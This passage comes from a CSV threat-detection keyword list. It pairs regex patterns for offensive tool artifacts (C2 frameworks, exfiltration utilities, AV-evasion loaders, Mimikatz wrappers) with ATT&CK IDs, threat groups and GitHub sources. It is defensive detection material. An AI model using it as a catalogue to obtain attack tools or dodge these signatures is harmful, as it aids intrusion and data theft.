- T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","455","76","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*execute-Pezor*",".{0,1000}execute\-Pezor.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*Executes a chosen Mimikatz command*",".{0,1000}Executes\sa\schosen\sMimikatz\scommand.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*Executes a powershell command on the remote host. Requires PSCMD*",".{0,1000}Executes\sa\spowershell\scommand\son\sthe\sremote\shost\.\sRequires\sPSCMD.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*Executes everything but DCSync - requires admin*",".{0,1000}Executes\severything\sbut\sDCSync\s\-\srequires\sadmin.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*execute-shellcode.py*",".{0,1000}execute\-shellcode\.py.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","77","12","2024-04-24T13:23:09Z","2021-01-25T12:36:46Z" "*Executing the exploit this may take a while.........................................*",".{0,1000}Executing\sthe\sexploit\sthis\smay\stake\sa\swhile\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/chaudharyarjun/LooneyPwner","1","0","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z" "*Execution_CommandAndScriptingInterpreter_UploadAndExec.py*",".{0,1000}Execution_CommandAndScriptingInterpreter_UploadAndExec\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Execution_UserExecution_CallbackCreateThreadpoolWait.py*",".{0,1000}Execution_UserExecution_CallbackCreateThreadpoolWait\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Execution_UserExecution_CallbackCreateTimerQueue.py*",".{0,1000}Execution_UserExecution_CallbackCreateTimerQueue\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Execution_UserExecution_CallbackEnumChildWindows.py*",".{0,1000}Execution_UserExecution_CallbackEnumChildWindows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Execution_UserExecution_CallbackEnumWindows.py*",".{0,1000}Execution_UserExecution_CallbackEnumWindows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Execution_UserExecution_DirectConnectReverseHTTPS.py*",".{0,1000}Execution_UserExecution_DirectConnectReverseHTTPS\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Execution_UserExecution_DirectConnectReverseTCPRc4.py*",".{0,1000}Execution_UserExecution_DirectConnectReverseTCPRc4\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Execution_UserExecution_FakePPID.py*",".{0,1000}Execution_UserExecution_FakePPID\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Execution_UserExecution_LinuxBaseShellcodeLoader.py*",".{0,1000}Execution_UserExecution_LinuxBaseShellcodeLoader\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Execution_UserExecution_LinuxSelfGuardLoader.py*",".{0,1000}Execution_UserExecution_LinuxSelfGuardLoader\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Execution_UserExecution_NtCreateSection.py*",".{0,1000}Execution_UserExecution_NtCreateSection\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Execution_UserExecution_Syscall_inject.py*",".{0,1000}Execution_UserExecution_Syscall_inject\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Execution_UserExecution_VSSyscallProject.py*",".{0,1000}Execution_UserExecution_VSSyscallProject\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*-ExecutionPolicy Bypass -File Win10.ps1 *",".{0,1000}\-ExecutionPolicy\sBypass\s\-File\sWin10\.ps1\s.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","10","6697","1259","2024-04-15T18:31:30Z","2019-03-26T22:36:32Z" "*-ExecutionPolicy Bypass -File Win11.ps1 *",".{0,1000}\-ExecutionPolicy\sBypass\s\-File\sWin11\.ps1\s.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","10","6697","1259","2024-04-15T18:31:30Z","2019-03-26T22:36:32Z" "*exegol4thewin*",".{0,1000}exegol4thewin.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ExegolController.py*",".{0,1000}ExegolController\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*exegol-docker-build*",".{0,1000}exegol\-docker\-build.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ExegolExceptions.py*",".{0,1000}ExegolExceptions\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Exegol-images-main*",".{0,1000}Exegol\-images\-main.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ExegolManager.py*",".{0,1000}ExegolManager\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ExegolProgress.py*",".{0,1000}ExegolProgress\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ExegolPrompt.py*",".{0,1000}ExegolPrompt\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ExeStager.csproj*",".{0,1000}ExeStager\.csproj.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*ExeToInjectInTo.*",".{0,1000}ExeToInjectInTo\..{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*ExeToLaunch StringToBePutAsCmdline*",".{0,1000}ExeToLaunch\sStringToBePutAsCmdline.{0,1000}","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","0","N/A","N/A","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*ExetoText.ps1*",".{0,1000}ExetoText\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*exfil -regex* -domain*-url * -filepath *",".{0,1000}exfil\s\-regex.{0,1000}\s\-domain.{0,1000}\-url\s.{0,1000}\s\-filepath\s.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "*ExfilDataToGitHub*",".{0,1000}ExfilDataToGitHub.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-ExfilDataToGitHub.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*ExfilDataToGitHub*",".{0,1000}ExfilDataToGitHub.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1140","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Exfil-EC266392-D6BC-4F7B-A4D1-410166D30B55.json*",".{0,1000}Exfil\-EC266392\-D6BC\-4F7B\-A4D1\-410166D30B55\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*exfiltrate_via_post.exe*",".{0,1000}exfiltrate_via_post\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*Exfiltration from DNS finished!*",".{0,1000}Exfiltration\sfrom\sDNS\sfinished!.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*Exfiltration from HTTPS finished!*",".{0,1000}Exfiltration\sfrom\sHTTPS\sfinished!.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*Exfiltration.tests.ps1*",".{0,1000}Exfiltration\.tests\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*existing_auto_target.rb*",".{0,1000}existing_auto_target\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*exit_nimbo*",".{0,1000}exit_nimbo.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*EXOCET-AV-Evasion-master*",".{0,1000}EXOCET\-AV\-Evasion\-master.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","1","N/A","10","8","789","146","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z" "*exocet-shellcode-exec-redo.go*",".{0,1000}exocet\-shellcode\-exec\-redo\.go.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","1","N/A","10","8","789","146","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z" "*--expected Bad --expected-stop Welcome*",".{0,1000}\-\-expected\sBad\s\-\-expected\-stop\sWelcome.{0,1000}","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 